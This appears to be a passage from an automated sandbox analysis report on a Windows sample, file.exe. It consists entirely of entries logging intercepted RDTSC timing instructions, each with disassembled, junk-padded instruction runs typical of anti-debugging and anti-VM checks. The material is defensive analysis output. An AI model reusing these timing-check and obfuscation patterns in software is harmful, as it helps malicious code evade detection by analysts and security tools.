                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A48 second address: 654A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A4D second address: 654A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jo 00007F7E2CC83C96h 0x0000000e popad 0x0000000f pushad 0x00000010 jne 00007F7E2CC83C96h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653A6F second address: 653A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653A73 second address: 653A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7E2CC83C9Eh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 jmp 00007F7E2CC83C9Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653480 second address: 653484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653484 second address: 653491 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653491 second address: 6534AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CD3B846h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6534AC second address: 653500 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CC83CACh 0x00000008 jmp 00007F7E2CC83CA4h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F7E2CC83C9Dh 0x00000017 push edx 0x00000018 jmp 00007F7E2CC83C9Bh 0x0000001d jmp 00007F7E2CC83CA6h 0x00000022 pop edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654724 second address: 65472A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65472A second address: 65473B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83C9Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65473B second address: 654757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7E2CD3B836h 0x0000000e jmp 00007F7E2CD3B83Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A189 second address: 65A198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F7E2CC83C96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A198 second address: 65A19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A19C second address: 65A1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658CA8 second address: 658CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658F66 second address: 658F70 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7E2CC83C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658F70 second address: 658F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658F76 second address: 658F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7E2CC83C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658F82 second address: 658F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6590D4 second address: 6590EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7E2CC83C9Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659520 second address: 65953B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B847h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65953B second address: 659562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CC83C9Bh 0x0000000b push edi 0x0000000c jnl 00007F7E2CC83C96h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F7E2CC83C96h 0x0000001b jne 00007F7E2CC83C96h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659562 second address: 659568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6596BA second address: 6596D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA1h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6596D3 second address: 6596F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F7E2CD3B848h 0x0000000b jmp 00007F7E2CD3B842h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6596F0 second address: 6596FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65897E second address: 658982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658982 second address: 65898A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6622C1 second address: 6622CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665304 second address: 665323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 js 00007F7E2CC83C96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CC83C9Bh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE8FF second address: 5CE92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7E2CD3B844h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7E2CD3B83Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664D72 second address: 664D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664D78 second address: 664D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664D7C second address: 664D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664D80 second address: 664D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664D86 second address: 664D9C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E2CC83C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F7E2CC83CA4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665036 second address: 665048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7E2CD3B836h 0x0000000a jp 00007F7E2CD3B836h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6673EE second address: 66740C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F7E2CC83CA4h 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66740C second address: 66742C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7E2CD3B836h 0x0000000a jnc 00007F7E2CD3B836h 0x00000010 popad 0x00000011 popad 0x00000012 jbe 00007F7E2CD3B848h 0x00000018 jbe 00007F7E2CD3B842h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66742C second address: 667432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B413 second address: 66B41E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B41E second address: 66B423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE5F second address: 66AE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE63 second address: 66AE6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE6B second address: 66AEA7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E2CD3B849h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7E2CD3B841h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F7E2CD3B84Dh 0x00000019 jc 00007F7E2CD3B836h 0x0000001f jmp 00007F7E2CD3B841h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AEA7 second address: 66AEBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F7E2CC83CA0h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B144 second address: 66B14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CD3B836h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B14F second address: 66B16D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67190F second address: 67192D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7E2CD3B846h 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67192D second address: 671947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E2CC83CA3h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671947 second address: 67194D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC2C2 second address: 5DC2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC2CA second address: 5DC2D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6704F6 second address: 670500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670500 second address: 67050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CD3B836h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67050A second address: 670518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670518 second address: 67051C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670668 second address: 670689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F7E2CC83CA8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670AD1 second address: 670AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670AD6 second address: 670AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83C9Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F7E2CC83C9Eh 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6758B9 second address: 6758BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674AD8 second address: 674AFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F7E2CC83CA7h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674AFB second address: 674B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674B0A second address: 674B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674C94 second address: 674CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674CA0 second address: 674CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674CA4 second address: 674CE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F7E2CD3B845h 0x0000000f jmp 00007F7E2CD3B83Bh 0x00000014 jmp 00007F7E2CD3B840h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674E3E second address: 674E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674E49 second address: 674E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674E56 second address: 674E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674E5A second address: 674E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6752A3 second address: 6752BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F7E2CC83C96h 0x00000008 jnc 00007F7E2CC83C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F7E2CC83C96h 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6752BD second address: 6752C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D769 second address: 67D777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F7E2CC83CA2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D777 second address: 67D77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C34A second address: 67C35B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C35B second address: 67C360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB75 second address: 67CB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1EA5 second address: 5D1ECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Eh 0x00000007 jmp 00007F7E2CD3B83Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1ECA second address: 5D1EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F7E2CC83C9Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CE8A second address: 67CEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F7E2CD3B848h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CEA7 second address: 67CEC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D4F1 second address: 67D502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7E2CD3B836h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D502 second address: 67D508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D508 second address: 67D50C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680868 second address: 68086E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6809DF second address: 6809E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6809E3 second address: 6809F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6809F9 second address: 680A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F7E2CD3B836h 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680A07 second address: 680A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E2CC83CA0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680A33 second address: 680A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jns 00007F7E2CD3B842h 0x00000012 jbe 00007F7E2CD3B836h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680D0A second address: 680D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6810F8 second address: 6810FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6810FC second address: 68110E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F7E2CC83C9Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681252 second address: 681256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681256 second address: 68126B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CC83C9Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68126B second address: 681277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jbe 00007F7E2CD3B836h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681277 second address: 681287 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F7E2CC83C9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C436 second address: 68C43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C43C second address: 68C440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
